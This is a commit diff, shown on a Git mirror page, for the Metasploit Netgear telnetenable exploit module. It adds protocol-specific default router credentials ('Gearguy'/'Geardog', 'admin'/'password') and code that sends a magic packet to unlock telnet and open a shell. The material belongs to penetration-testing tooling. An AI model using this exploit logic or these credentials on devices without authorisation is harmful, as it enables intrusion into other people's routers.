infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use default creds specific to protocol

GSoC/Meterpreter_Web_Console
William Vu 2018-03-02 06:20:21 -06:00
parent 1f40afea9c
commit fba30d47a2
1 changed files with 26 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/linux/telnet/netgear_telnetenable.rb
View File

@ -39,9 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote
} }
}, },
'Targets' => [ 'Targets' => [
['Automatic (detect TCP or UDP)', proto: :auto], ['Automatic (detect TCP or UDP)',
['TCP (typically older devices)', proto: :tcp], proto: :auto
['UDP (typically newer devices)', proto: :udp] ],
['TCP (typically older devices)',
proto: :tcp,
username: 'Gearguy',
password: 'Geardog'
],
['UDP (typically newer devices)',
proto: :udp,
username: 'admin',
password: 'password'
]
], ],
'DefaultTarget' => 0 'DefaultTarget' => 0
)) ))
@ -49,13 +59,15 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(23), Opt::RPORT(23),
OptString.new('MAC', [true, 'MAC address of device']), OptString.new('MAC', [true, 'MAC address of device']),
OptString.new('USERNAME', [true, 'Username on device', 'Gearguy']), OptString.new('USERNAME', [false, 'Username on device']),
OptString.new('PASSWORD', [true, 'Password on device', 'Geardog']) OptString.new('PASSWORD', [false, 'Password on device'])
]) ])
end end
def exploit def exploit
@proto = target[:proto] @proto = target[:proto]
@username = datastore['USERNAME'] || target[:username]
@password = datastore['PASSWORD'] || target[:password]
# Detect TCP or UDP # Detect TCP or UDP
if @proto == :auto if @proto == :auto
@ -71,6 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
# Try to use default creds
unless @username && @password
tgt = targets.find { |t| t[:proto] == @proto }
@username = tgt[:username]
@password = tgt[:password]
end
# Shell it # Shell it
exploit_telnetenabled exploit_telnetenabled
connect_telnetd connect_telnetd
@ -79,11 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit_telnetenabled def exploit_telnetenabled
# Generate the magic packet # Generate the magic packet
print_status('Generating magic packet') print_status('Generating magic packet')
payload = magic_packet( payload = magic_packet(datastore['MAC'], @username, @password)
datastore['MAC'],
datastore['USERNAME'],
datastore['PASSWORD']
)
# Send the magic packet via TCP or UDP # Send the magic packet via TCP or UDP
begin begin